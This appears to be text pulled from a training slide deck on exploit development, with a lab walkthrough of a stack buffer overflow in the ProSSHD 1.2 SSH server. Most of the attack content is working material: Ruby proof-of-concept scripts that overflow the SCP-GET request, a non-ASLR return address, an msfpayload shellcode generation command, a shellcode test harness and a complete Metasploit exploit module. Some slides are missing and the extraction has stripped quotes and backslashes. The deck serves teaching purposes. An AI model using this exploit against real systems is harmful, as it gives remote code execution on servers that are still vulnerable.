3. Install ProSSHD in vmware
• Set up W7 vmware client, host only mode.
• Determine vmware client IP.
• Ping vmware client from host system.
• Install Demo ProSSHD inside vm, run it.
3
4. Exploit Development Process
• Crash Program in Debugger
• Control EIP (next instruction)
• Determine Offset of Overwrite to EIP
• Determine Opcode to return to (new EIP)
• Determine Space Constraints
• Select and Test Shellcode
• Build Exploit Sandwich
• Determine Bad Characters
4
5. Immunity Debugger
• Fork from OllyDbg
• Still looks and feels like OllyDbg
• Adds a Python Command Shell
• Allows for more automation
• pvefindaddr is a great plugin tool for
exploit development! http://corelan.be
• Note: there was a problem with 1.74
• Current version is 1.80
5
6. Save Snapshot, Attach Debugger
• In Vmware, save snapshot (prior to sending)
• Send Exploit, with Sleep(15) before send
• File->Attach->wsshd.exe (may need to sort)
• In debugger, hit F9 to continue process
6
7. Crash the ProSSHD Server
• From host, crash remote server, control EIP
#prosshd1.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1' #need to set this up on the test victim (os account)
password = 'test1' #need to set this up on the test victim machine
host = '10.10.10.143
port = 22
# use A's to overwrite eip
get_request = "x41" * 516
# lets do it…
Net::SSH.start( host, username, :password => password) do|ssh|
sleep(15) # gives us time to attach to wsshd.exe
ssh.scp.download!( get_request, "foo.txt )# 2 params:remote,local file
end
• Run exploit with ruby prosshd1.rb
• Attach debugger to wsshd.exe, after it loads, Hit F9 twice
7
8. Determine the Offset(s)
• Revert VM, then use Pattern_Create
#prosshd2.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1' #need to set this up on the test victim (os account)
password = 'test1' #need to set this up on the test victim machine
host = '10.10.10.143
port = 22
# use A's to overwrite eip
get_request=
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A
c4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8
Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah
3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7A
j8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2
Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao
7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
# lets do it…
Net::SSH.start( host, username, :password => password) do|ssh|
sleep(15) # gives us time to attach to wsshd.exe
ssh.scp.download!( get_request, "foo.txt )# 2 params:remote,local file
end
Run exploit with ruby prosshd2.rb
8
11. Determine Op-Codes to Return to
• Determine the Control Vector, we could:
– JMP ESP
– RETN
• We choose JMP ESP
• Could use msfpescan on ntdll.dll
11
12. Determine Op-Codes to Return to
• Problem: Vista and beyond protect
NTDLL.DLL with ASLR
• Need to find a non-ASLR module
• This is the best way to bypass ASLR
• pvefindaddr is the tool of choice
• Run with !pvefindaddr j –r esp -n in
ImmDbg
• Results in file j.txt:
• C:Users[your name here]AppDataLocalVirtualStoreProgram Files
Immunity IncImmunity Debugger !
12
13. Determine Op-Code Address
==================================================================!
pvefindaddr v1.32 corelanc0d3r - http://www.corelan.be:8800!
-----Loaded modules ---------------------------------------------- !
Fixup | Base | Top | Size | SafeSEH | ASLR |NXCompat
| Modulename & Path!
----------------------------------------------------------------!
NO | 0x7C340000 | 0x7C396000 | 0x00056000 | yes | NO | NO
|MSVCR71.dll:C:UsersPublicProgram FilesLab-NCProSSHDMSVCR71.dll!
yes | 0x76210000 | 0x762E4000 | 0x000D4000 | yes | yes | yes
| kernel32.dll : C:Windowssystem32kernel32.dll!
yes | 0x77A50000 | 0x77B8C000 | 0x0013C000 | yes | yes | yes
| ntdll.dll : C:WindowsSYSTEM32ntdll.dll !
<truncated for brevity>!
NO | 0x00400000 | 0x00457000 | 0x00057000 | yes | NO | NO
| wsshd.exe : C:UsersPublicProgram FilesLab-NCProSSHDwsshd.exe!
<truncated for brevity>!
Found push esp - ret at 0x7C345C30 [msvcr71.dll] - [Ascii printable]
{PAGE_EXECUTE_READ} [SafeSEH: Yes - ASLR: ** No (Probably not) **]
[Fixup: ** NO **] - !
C:UsersPublicProgram FilesLab-NCProSSHDMSVCR71.dll
<truncated for brevity>!
13
14. Find Space Constraints
• Crash with 2000 A s, calculate depth of
buffer
#prosshd3.rb …truncated for brevity…!
get_request = "x41" * 492 + "x42x42x42x42" +
x41 * 2000!
• Run, Attach, Crash, inspect stack for buffer size!
0x0012f758-0x0012ef88= 2000
So we can fit 2000 bytes of
shellcode into the buffer!
14
15. Select and Test Shellcode
• Generate your shellcode (switching to C)
$ msfpayload windows/exec cmd=calc.exe R | msfencode -b 'x00x0a' -e x86/
shikata_ga_nai –t c sc.txt!
!
• Take that shellcode and copy paste into the following harness
//shellcode.c char shellcode[] = //copy paste from above!
x31xc0x31... your shellcode goes here;!
int main() { !//main function !
int *ret; !//ret pointer for saved ret !
ret = (int *)ret + 2;! //set ret to point to the saved return!
(*ret) = (int)shellcode; //change the saved ret to addr of shellcode!
}!
15
16. Select and Test Shellcode
Notice: we disabled DEP (/NXCOMPAT)… does not matter here as our vulnerable
program is not linked with /NXCOMPAT by default.
16
18. Test Exploit with Debugger
• Run with ruby prosshd4.rb
• Hit F9 twice to hit breakpoint
• Hit F9 to Continue, if crash, then bad
character.
18
19. Find Bad Characters
• Revert VM, resend exploit, step through
• Tip 1: right click on halted instruction, follow in dump…
Shellcode is
mangled…
why? bad
char x0a
19
21. Metasploit Decoders
• Require space on the stack to decode
• Modules use stackadjustment parameter
• You may want to add 16 bytes of NOP to
beginning of payload to be safe.
21
22. Success!
• Revert VM to running state
• Launch Exploit with new shellcode
• Remove xcc, replace with x90, fire off exploit
• P0wn3d!!!!! Where do you want to go today!
22
23. Automating
• Metasploit as you have seen is an
excellent tool for both exploit development
and execution.
• You should look at existing modules, best
way to learn techniques.
• There is no ProSSHD module L
• We will create one and automate our
attack!
23
25. Header
##!
# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $!
##!
!
##!
# This file is part of the Metasploit Framework and may be subject to!
# redistribution and commercial restrictions. Please see the Metasploit!
# Framework web site for more information on licensing and terms of use.!
# http://metasploit.com/framework/!
##!
!
require 'msf/core'!
%w{rubygems net/ssh net/scp}.each { |x| require x }!
!
class Metasploit3 Msf::Exploit::Remote!
!Rank = AverageRanking!
!
!include Msf::Exploit::Remote::Tcp!
25
26. Initialize Section
!def initialize(info = {})!
! !super(update_info(info,!
! !'Name' = 'ProSSHD 1.2.x SCP-GET Buffer Overflow',!
! !'Description' = %q{!
! !This module exploits a simple stack buffer overflow in ProSSHD 1.2.!
! !This flaw is due to a buffer overflow error when handling a specially!
! !crafted scp get request from an SSH client.!
! !**Based on original Exploit by S2 Crew [Hungary]!
! !},!
! !'Author' = 'AAH',!
! !'License' = MSF_LICENSE,!
! !'Version' = '$Revision: 10000 $',!
! !'References' = [],!
! !'DefaultOptions' = {'EXITFUNC' = 'process ,},!
! !'Payload' = {'Space' = 1000,!
! ! ! 'BadChars' = x00x09x0ax20x21,!
! ! ! 'StackAdjustment' = -3500,},!
! !'Platform' = 'win',!
! !'Targets' = [[ 'Windows 7', { 'Ret' = 0x7c345c30 } ],],!
! !'Privileged' = true,!
! !'DisclosureDate' = 'March 3, 2010',!
! !'DefaultTarget' = 0))!
! !register_options([ !
OptString.new('USERNAME', [ true, 'The username to authenticate as' ]), !
! OptString.new('PASSWORD', [ true, 'The password for the specified username' ]),!
! ! Opt::RPORT(22)], self.class)!
!end!
!
26
27. Exploit Section
def exploit!
! !!
!!
get_request = x41 * 492 + !
[target.ret].pack(‘V’) + !
x90 * 1000 +!
!payload.encoded # shellcode 8)!
! !
! !print_status(Trying to connect to #{datastore['RHOST']}...)!
! !!
! !# lets do it...!
! !Net::SSH.start( datastore['RHOST'], datastore['USERNAME'], :password = datastore
['PASSWORD']) do|ssh|!
! ! #sleep(15) # gives us time to attach to wsshd.exe!
! print_status(Sending sploit to #{datastore['RHOST']}...)!
! ! ssh.scp.download!( get_request, foo.txt) # 2 params: remote file, local file!
! !end!
! !handler!
!end!
end!
!
27
28. Setup
• Next, install the following rubygems
• Have to run CygShell as Administrator (on older MSF)
• Right click on it in start menu, select run as
Administrator
28